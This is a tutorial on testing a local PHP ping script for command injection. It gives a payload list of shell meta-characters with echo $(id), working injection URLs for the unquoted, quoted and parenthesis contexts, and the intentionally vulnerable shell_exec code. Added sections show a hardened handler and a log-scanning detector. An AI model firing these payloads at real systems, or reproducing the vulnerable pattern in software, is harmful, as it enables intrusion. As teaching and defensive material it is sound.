Here are some meta-characters we can use when testing for command injections.
%0aecho $(id)
%0d%0aecho $(id)
[space]echo $(id)
; echo $(id)
'; echo $(id)
"; echo $(id)
); echo $(id)
| echo $(id)
'| echo $(id)
"| echo $(id)
)| echo $(id)
& echo $(id)
'& echo $(id)
"& echo $(id)
)& echo $(id)
&& echo $(id)
'&& echo $(id)
"&& echo $(id)
)&& echo $(id)
%0a echo $(id)
'%0a echo $(id)
"%0a echo $(id)
)%0a echo $(id)
%0d%0aecho $(id)
'%0d%0aecho $(id)
"%0d%0aecho $(id)
)%0d%0aecho $(id)
Basic Command Injection
Here we have the first command injection. It's simple enough: it takes an IP address, pings it, and returns the output. The PHP code behind the command injection is as follows.
<?php print "<pre>".shell_exec("ping -c 5 ".$_GET['c'])."</pre>" ?>
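To put the fix next to the bug, here is an added example (my own code, not from the original post): the vulnerable one-liner above as a function, beside a hardened version of the same ping handler. The parameter name c and the ping -c 5 command are the post's; the function names are mine, and the argv form of proc_open assumes PHP 7.4 or later.

```php
<?php
// Added example, not from the original post. Function names are assumed.

// Vulnerable: the raw GET value is concatenated into a shell command line,
// so any shell meta-character in 'c' (newline, ';', '|', '&', quotes, ')')
// ends the ping command and starts whatever follows.
function ping_vulnerable(string $c): string {
    return (string) shell_exec("ping -c 5 " . $c);
}

// Hardened in layers:
//  1. Allow-list validation: only a syntactically valid IP address is
//     accepted, so no meta-character or extra ping flag reaches the command.
//  2. proc_open() with an argv array (PHP >= 7.4) runs ping directly with
//     no shell in between, so there is no command line left to break out of.
//  3. escapeshellarg() is the fallback if a shell were unavoidable; it is
//     shown in a comment because the no-shell path does not need it.
function ping_hardened(string $c): ?string {
    $ip = filter_var($c, FILTER_VALIDATE_IP);
    if ($ip === false) {
        return null;                  // reject; do not try to "clean" the input
    }
    // Shell fallback would be: shell_exec("ping -c 5 " . escapeshellarg($ip))
    $proc = proc_open(
        ['ping', '-c', '5', $ip],     // $ip is one argument, never re-parsed
        [1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
        $pipes
    );
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

$result = ping_hardened($_GET['c'] ?? '');
if ($result === null) {
    http_response_code(400);
    print "<pre>invalid address</pre>";
} else {
    // Command output is HTML-escaped before it is reflected into the page.
    print "<pre>" . htmlspecialchars($result) . "</pre>";
}
```

The order of the layers matters: validation rejects every payload in the list at the top of the post before anything is executed, and running ping without a shell means that even a validation mistake would not hand the attacker a command line. Escaping alone is the weakest of the three because it still leaves a shell in the path.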
We first try a few characters to see whether we can get command execution through CRLF line breaks.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%0aecho%20$(id)
As you can see, we got successful code execution by using a '%0a' LINE FEED character. Let's try with both CARRIAGE RETURN and LINE FEED.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%0d%0aecho%20$(id)
We got execution with it as well. Many people do not try these characters when testing for command execution, but they are well worth trying.
Next we move on to the other characters we can use for command injection.
http://127.0.0.1/~sam/c.php?c=127.0.0.1;echo $(id)
As you can see we got successful command execution with the ';' character.
http://127.0.0.1/~sam/c.php?c=127.0.0.1|echo $(id)
And we got execution with the '|' character.
Single Quote Command Injection
Sometimes the injection is not as straightforward as you would like. For instance, the input may be wrapped in quotes, either single or double. Let's test some strings to see whether we can get successful command execution.
http://127.0.0.1/~sam/c.php?c=127.0.0.1';echo $(id)'
The string '; works and we get command execution.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%27|echo $(id)'
The pipe character also works in this command injection.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%27%0aecho $(id)'
LINE FEED also works.
http://127.0.0.1/~sam/c.php?c=127.0.0.1%27%0d%0aecho $(id)'
So does CRLF.
Double Quote Command Injection
Just like single quote injection, double quote injection can be a pain in the neck sometimes.
http://127.0.0.1/~sam/c.php?c=127.0.0.1";echo $(id)"
The semi-colon works with this injection,
http://127.0.0.1/~sam/c.php?c=127.0.0.1"|echo $(id)"
and so does the pipe character.
http://127.0.0.1/~sam/c.php?c=127.0.0.1"%0aecho $(id)"
LINE FEED works.
http://127.0.0.1/~sam/c.php?c=127.0.0.1"%0d%0aecho $(id)"
And so does CRLF.
Parenthesis Command Injection
Sometimes you might come across a command injection that uses the ')' character as the delimiter.
http://127.0.0.1/~sam/c.php?c=edads)$(id
As you can see, the output of the id command came back in the response.
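Every section above ends with the same observation: a separator (CRLF, ';', '|', '&'), a quote or a ')' breaks out of the intended command and $(id) runs. From the defender's side those same separators are what you look for in request logs. The following is an added example (my own code, not from the original post) that decodes the query string of each access-log line and flags the separator families the post lists. The log format, the sample lines and the pattern names are constructed for this example; the script path /~sam/c.php and the payloads in the samples are the ones the post uses.

```php
<?php
// Added example, not from the original post. Patterns and names are my own.

// One pattern per family of separators from the post's list. They are applied
// to the URL-decoded query, so %0a and a literal newline are treated alike.
const INJECTION_PATTERNS = [
    'crlf'        => '/[\r\n]/',             // %0a, %0d%0a
    'separator'   => '/[;&|]/',              // ;  |  &  &&
    'subshell'    => '/\$\(|`/',             // $(...) or backticks
    'quote_break' => '/[\'"]\s*[;&|\r\n]/',  // ';  "|  '%0a ...
    'paren_break' => '/\)\s*[;&|\r\n$]/',    // );  )|  )$(
];

// Return the names of every pattern that matches the decoded query string.
function classify_query(string $query): array {
    $decoded = urldecode($query);
    $hits = [];
    foreach (INJECTION_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Scan combined-log style lines; return one alert per request that matched.
function scan_log(array $lines): array {
    $alerts = [];
    foreach ($lines as $line) {
        // Request target is the second token inside the quoted request field.
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;                    // no query string, nothing to inspect
        }
        $hits = classify_query($query);
        if ($hits) {
            $alerts[] = ['request' => $m[1], 'indicators' => $hits];
        }
    }
    return $alerts;
}

// Constructed sample log: two benign pings and three of the post's payloads.
$sample_log = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /~sam/c.php?c=127.0.0.1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /~sam/c.php?c=127.0.0.1%0aecho%20$(id) HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /~sam/c.php?c=127.0.0.1%27|echo%20$(id)%27 HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /~sam/c.php?c=edads)$(id HTTP/1.1" 200 640',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /~sam/c.php?c=8.8.8.8 HTTP/1.1" 200 512',
];

foreach (scan_log($sample_log) as $alert) {
    printf("ALERT %s  [%s]\n", $alert['request'], implode(',', $alert['indicators']));
}
```

On the sample above the two plain addresses produce nothing, the %0a request is flagged as crlf and subshell, the quoted pipe request as separator, subshell and quote_break, and the parenthesis request as subshell and paren_break. Decoding before matching is the important step: a rule that only looks for a literal newline never sees %0a. This kind of scan is a detection aid for an application that should not be building shell commands from the parameter in the first place; it narrows the hunt, it does not replace the fix.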